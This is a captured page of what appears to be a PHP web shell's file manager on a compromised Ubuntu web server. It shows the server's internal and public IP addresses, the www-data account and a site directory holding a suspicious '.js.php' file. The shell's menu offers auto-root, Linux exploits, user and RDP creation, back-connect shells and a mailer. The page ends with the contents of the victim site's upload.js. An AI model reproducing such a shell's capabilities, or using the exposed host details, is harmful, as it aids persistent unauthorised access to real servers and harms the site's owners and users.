Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.146.65.5
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm2020 /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxrwxrwx
pg
[ DIR ]
drwxrwxrwx
.js.php
3.61
KB
-rw-r--r--
MainPageCompressed.js
341.08
KB
-rwxrwxrwx
add-course.js
11.42
KB
-rwxrwxrwx
admin.js
15.25
KB
-rwxrwxrwx
advanced-form-elements.js
5.41
KB
-rwxrwxrwx
app-status.js
14.32
KB
-rwxrwxrwx
compressed.js
440.45
KB
-rwxrwxrwx
control.js
18.43
KB
-rwxrwxrwx
demo.js
3.33
KB
-rwxrwxrwx
forgot-password.js
3.26
KB
-rwxrwxrwx
form_submit.js
1.3
KB
-rwxrwxrwx
helpers.js
576
B
-rwxrwxrwx
kusPhdAdm.js
50.93
KB
-rwxrwxrwx
kusPhdAdm_03082019.js
45.47
KB
-rwxrwxrwx
kusPhdAdm_04122018.js
30.02
KB
-rwxrwxrwx
kusPhdAdm_12122018.js
45.47
KB
-rwxrwxrwx
kusPhdAdm_17092018.js
29.67
KB
-rwxrwxrwx
kusPhdAdm_23092018.js
29.74
KB
-rwxrwxrwx
login.js
478
B
-rwxrwxrwx
script.js
3
B
-rwxrwxrwx
sign-in.js
4.29
KB
-rwxrwxrwx
sign-up.js
4.52
KB
-rwxrwxrwx
upload.js
5.64
KB
-rwxrwxrwx
upload_18092018.js
5.52
KB
-rwxrwxrwx
validate.js
9.29
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload.js
function loaduploads() { $.ajax({ type: "POST", async: true, url: $host_url + "uploaddetails", success: function uploaddetailsResponce(responce) { responce = eval("(" + responce + ")"); let uploadtable = `<style type = "text/css"> .table-upd tbody tr td { padding : 2px; vertical-align:middle; border: 1px solid #949494; text-align: left; } .table-upd tbody upd-file { display: inline !important; } .table-upd tbody input[type="file"] { display: inline; } .table-upd tbody button { padding : 7px; margin: 15px; } .table-upd thead tr td { text-align: center; } </style> <table class='table table-bordered table-striped table-upd' id = "uploaddet"> <thead> <tr class = "bg-cyan"> <td style = "width :5%">Sl. No.</td> <td style = "width : 40%;" >Description</td> <td style = "width : 30%;">Upload</td> <td style = "width : 25%;">File</td> </tr> </thead> <tbody>`; var masdoc = responce.data.masdoc; let z = 1; $.each(masdoc, function (key, value) { uploadtable += `<tr> <td style = "text-align: center;">${z}</td> <td id = "doc_upload_${value.int_code}">${value.doc_type}</td> <td style=" display: flex; align-items: center; justify-content: space-around; " > <input type="file" name="${value.int_code}" id="${value.FFILENAME}" class = "upd-file" style="width:100px;padding:5px 0px;" /> <input type = "hidden" id = "h_${value.FFILENAME}"> <button class="btn btn-success waves-effect btn-lg" style = "padding: 5px;" onclick= 'UploadEmployeeDocuments("${value.FFILENAME}")'>Upload </button> </td> <td id="attach_td_${value.FFILENAME}"></td> </tr>`; z++; }); $("#upddet").html(uploadtable); }, }); } function loadedituploads(degree, college, fappno) { var datastr = "°ree=" + degree + "&college=" + college + "&fappno=" + fappno; $.ajax({ type: "POST", async: true, url: $host_url + "uploadeditdetails", data: datastr, success: function uploadeditdetailsResponce(responce) { responce = eval("(" + responce + ")"); let uploadtable = `<style type = "text/css"> .table-upd tbody tr td { padding : 2px; vertical-align:middle; border: 1px solid #949494; text-align: left; } .table-upd tbody upd-file { display: inline !important; } .table-upd tbody input[type="file"] { display: inline; } .table-upd tbody button { padding : 7px; margin: 15px; } .table-upd thead tr td { text-align: center; } </style> <table class='table table-bordered table-striped table-upd' id = "uploaddet"> <thead> <tr class = "bg-cyan"> <td style = "width :5%">Sl. No.</td> <td style = "width : 40%;" >Description</td> <td style = "width : 30%;">Upload</td> <td style = "width : 25%;">File</td> </tr> </thead> <tbody>`; var masdoc = responce.data.masdoc; let z = 1; var alist = ""; $.each(masdoc, function (key, value) { alist = ""; if (value.file_path != "") { alist = `<a href = "${ $photo_url + value.file_path }" target = '_blank'>${value.FFILENAME}</a>`; } uploadtable += `<tr> <td style = "text-align: center;">${z}</td> <td id = "doc_upload_${value.int_code}">${value.doc_type}</td> <td style=" display: flex; align-items: center; justify-content: space-around; "> <input type="file" name="${value.int_code}" id="${value.FFILENAME}" class = "upd-file" style="width:100px;padding:5px 0px;" /> <input type = "hidden" id = "h_${value.FFILENAME}"> <button class="btn btn-success waves-effect btn-lg" style = "padding: 5px;" onclick= 'UploadEmployeeDocuments("${value.FFILENAME}")'>Upload </button> </td> <td id="attach_td_${value.FFILENAME}">${alist}</td> </tr>`; z++; }); $("#upddet").html(uploadtable); }, }); } function UploadEmployeeDocuments(file_file) { console.log(file_file); var file_name = $("#" + file_file).val(); console.log(file_name); var file_size = $("#" + file_file)[0].files[0].size; var file_extn = file_name.split(".").pop(); var file_extn = file_extn.toLowerCase(); if (file_extn == "jpeg" || file_extn == "jpg" || file_extn == "pdf") { } else { alert("JPEG, JPG, PDF files are allowed!"); return false; } if (file_size >= 1000000) { alert("Upload files with size less then 1MB!"); return false; } var file_data = $("#" + file_file).prop("files")[0]; var form_data = new FormData(); form_data.append("file", file_data); $.blockUI({ message: "<h1 class='h1' style='font-size:12px'><img src='../images/ajax-loader.gif' border='0'></h1>", }); $.ajax({ type: "POST", url: "upload_file.php", data: form_data, cache: false, contentType: false, processData: false, success: function (data) { $.unblockUI(); $("#h_" + file_file).val(data); console.log(data); var str = `<a href = "${ $host_url2 + "/upload/" + data }" target = "_blank">${file_file}</a>`; document.getElementById("attach_td_" + file_file).innerHTML = str; }, error: function (data) { alert(data); }, }); }
Close